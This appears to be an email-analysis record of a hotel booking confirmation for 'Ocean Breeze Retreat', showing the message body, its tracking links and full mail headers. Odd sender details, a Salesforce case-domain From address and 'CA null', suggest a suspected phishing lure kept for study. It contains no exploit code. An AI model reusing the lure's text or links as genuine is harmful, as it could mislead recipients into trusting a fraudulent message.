                                                                                                                          Date:Fri, 07 Mar 2025 23:04:42 +0100
                                                                                                                          Communications:
                                                                                                                          • david@corerecon.com <https://cl.s12.exct.net/open.aspx?ffcb10-fefe1072716106-fe8b1779716d0c7f74-fe3511737164057b741773-ff6117727c-fe8d16777363067a76-ff3c15707566&d=120027&bmt=0> To view this email as a web page, go here. <https://view.s12.exacttarget.com/?qs=44dafead476a1871e9f31d7a8df77b355359621e30d614843b0357fede10ce355ea3775573b5c79cee8168c942cedf53b9c5f0d7996ce92ce11c3a64184670912e5465d149ffe9761001de0de1d7978e> Your Stay Has Been Successfully Booked Welcome to Ocean Breeze Retreat Dear david@corerecon.com, We are pleased to confirm your reservation at Ocean Breeze Retreat. Below are your booking details: Reservation Details Here are the details of your upcoming stay: Check-in Date: April 10, 2025 Check-out Date: April 15, 2025 Room Type: Premium Oceanview Suite Guests: 2 Adults Total Amount: 2,648.00$ Manage Your Reservation <https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547> Important Information * Check-in: 3:00 PM | Check-out: 11:00 AM * Free cancellation available until April 7, 2025 * Complimentary access to the private beach & spa * Contact us for any special requests For assistance, contact us at support@oceanbreeze.com Ocean Breeze Retreat, 725 Coastal Drive, Santa Monica, CA 90401, USA Phone: (877) 468-9723 This email was sent to: david@corerecon.com This email was sent by: Bthrice 1240 S Corning St Los Angeles, CA null US We respect your right to privacy - view our policy <https://cl.s12.exct.net/?qs=dd02f46a2b01ff14dc5b7da9efafacd0d43e00a253b781cd62717532a53336f4a17deb78daec73fc73f237543d44a48e1e41ba258457ec6d> <https://www.exacttarget.com/images/Powered_By_1206.jpg> Manage Subscriptions <https://cl.S12.exct.net/subscription_center.aspx?qs=963b645280b3b2cd6b4ca45389a44a0d3096c4c34d6df6dbae44361b74a1e7ebf9a71db37e16672b3aea865908e84f52d4737e9228bd253b5a11c86b809c5bf1> | Update Profile <https://cl.S12.exct.net/profile_center.aspx?qs=963b645280b3b2cd2143912c2729c2aa880af1d0fcd2da980b66ac4d050ddd23d9622d7abebee190874f3df766895ed49841a543fdf9040dbe23394f02a4ceb6> | Unsubscribe <https://cl.S12.exct.net/unsub_center.aspx?qs=963b645280b3b2cd6b4ca45389a44a0d3096c4c34d6df6dbae44361b74a1e7eb9e6c9537d8482f185ddf72405d4781ff994693b45fe39c9f3cc73f3ace7da3448e24950e880c80ba>
                                                                                                                          Attachments:
                                                                                                                            Key Value
                                                                                                                            Receivedby lw7.mta.exacttarget.com id hpdmnm2fmd40 for <david@corerecon.com>; Fri, 7 Mar 2025 22:04:42 +0000 (envelope-from <bounce-329_HTML-2767273-42452-534016133-1002@bounce.s12.exacttarget.com>)
                                                                                                                            2204:48 +0000
                                                                                                                            by PH7PR11MB5796.namprd11.prod.outlook.com (260310b6:510:13b::13) with
                                                                                                                            2025 2204:43 +0000
                                                                                                                            (260310b6:a03:39f::15) with Microsoft SMTP Server (version=TLS1_3,
                                                                                                                            7 Mar 2025 2204:43 +0000
                                                                                                                            Authentication-Resultsspf=pass (sender IP is 13.110.209.7)
                                                                                                                            Received-SPFPass (protection.outlook.com: domain of
                                                                                                                            15.20.8511.15 via Frontend Transport; Fri, 7 Mar 2025 2204:43 +0000
                                                                                                                            DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; s=fbldkim12; d=s12.y.mc.salesforce.com;
                                                                                                                            h=FromTo:Subject:Date:List-Unsubscribe:MIME-Version:Message-ID:Content-Type;
                                                                                                                            Message-IDContent-Type;
                                                                                                                            From"Ocean Breeze" <support@w-d7f249u2qdtv96vtgmgtwp7r8y22vk78h3ic66fai8z8a57es.hn-3cawemao.na231.case.salesforce.com>
                                                                                                                            To<david@corerecon.com>
                                                                                                                            Subject=?UTF-8?B?RGVhciwgZGF2aWRAY29yZXJlY29uLmNvbSAtIFlvdXIgU3RheSBI?=
                                                                                                                            DateFri, 07 Mar 2025 16:04:42 -0600
                                                                                                                            List-Unsubscribe<https://cl.S12.exct.net/subscription_center.aspx?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJtaWQiOiI1MzQwMTYxMzMiLCJzIjoiMjc2NzI3MyIsImxpZCI6IjMyOSIsImoiOiI0MjQ1MiIsImpiIjoiMTAwMiIsImQiOiIxMjAwMjcifQ.JoxMxFVmbw_xrLNOtnIiV4v2x5hnFu0NAsS16Z5H74I>, <mailto:leave-fd4d17727c0b5c392848-fe8d16777363067a76-fefe1072716106-fe3511737164057b741773-ff3c15707566@leave.s12.exacttarget.com>
                                                                                                                            List-Unsubscribe-PostList-Unsubscribe=One-Click
                                                                                                                            MIME-Version1.0
                                                                                                                            X-SFMC-Stack12
                                                                                                                            x-job534016133_42452
                                                                                                                            Message-ID<04ad5994-fb3f-412b-8faf-40aa3acd2c3c@iad4s12mta1145.xt.local>
                                                                                                                            Content-Typemultipart/alternative;
                                                                                                                            boundary="hLN7BLacvDGC=_?"
                                                                                                                            Return-Pathbounce-329_HTML-2767273-42452-534016133-1002@bounce.s12.exacttarget.com
                                                                                                                            X-MS-Exchange-Organization-ExpirationStartTime07 Mar 2025 22:04:43.4943
                                                                                                                            X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                                                                                                            X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                                                                                                            X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                                                                                                            X-MS-Exchange-Organization-Network-Message-Idffd05e59-a730-4d16-bd90-08dd5dc410e5
                                                                                                                            X-EOPAttributedMessage0
                                                                                                                            X-EOPTenantAttributedMessagefd95b4e8-ccc7-4e27-b8dc-ec4c54e4a14d:0
                                                                                                                            X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                                                                                                            X-MS-PublicTrafficTypeEmail
                                                                                                                            X-MS-TrafficTypeDiagnosticBY1PEPF0001AE18:EE_|PH7PR11MB5796:EE_|PH8PR11MB6611:EE_
                                                                                                                            X-MS-Exchange-Organization-AuthSourceBY1PEPF0001AE18.namprd04.prod.outlook.com
                                                                                                                            X-MS-Exchange-Organization-AuthAsAnonymous
                                                                                                                            X-MS-Office365-Filtering-Correlation-Idffd05e59-a730-4d16-bd90-08dd5dc410e5
                                                                                                                            X-MS-Exchange-Organization-SCL1
                                                                                                                            X-Microsoft-AntispamBCL:0;ARA:13230040|4022899009|69100299015|5073199012|4076899003|8096899003|13003099007|7053199007|51400299038;
                                                                                                                            X-Forefront-Antispam-ReportCIP:13.110.209.7;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:lw7.mta.exacttarget.com;PTR:lw7.mta.exacttarget.com;CAT:NONE;SFS:(13230040)(4022899009)(69100299015)(5073199012)(4076899003)(8096899003)(13003099007)(7053199007)(51400299038);DIR:INB;
                                                                                                                            X-MS-Exchange-CrossTenant-OriginalArrivalTime07 Mar 2025 22:04:43.2911
                                                                                                                            X-MS-Exchange-CrossTenant-Network-Message-Idffd05e59-a730-4d16-bd90-08dd5dc410e5
                                                                                                                            X-MS-Exchange-CrossTenant-Idfd95b4e8-ccc7-4e27-b8dc-ec4c54e4a14d
                                                                                                                            X-MS-Exchange-CrossTenant-AuthSourceBY1PEPF0001AE18.namprd04.prod.outlook.com
                                                                                                                            X-MS-Exchange-CrossTenant-AuthAsAnonymous
                                                                                                                            X-MS-Exchange-CrossTenant-FromEntityHeaderInternet
                                                                                                                            X-MS-Exchange-Transport-CrossTenantHeadersStampedPH7PR11MB5796
                                                                                                                            X-MS-Exchange-Transport-EndToEndLatency00:00:05.1829660
                                                                                                                            X-MS-Exchange-Processed-By-BccFoldering15.20.8511.019
                                                                                                                            X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(4710117)(4712020)(920097)(930097)(140003);
                                                                                                                            X-Microsoft-Antispam-Message-Info=?us-ascii?Q?JOogzKhSx5SYzqsIzD+c7fnwPx5SmJzuB/wIohgJgfy10I/Q7bLlO99IyssX?=
                                                                                                                            dateFri, 07 Mar 2025 23:04:42 +0100

                                                                                                                            Icon Hash:c4e1928eacb280a2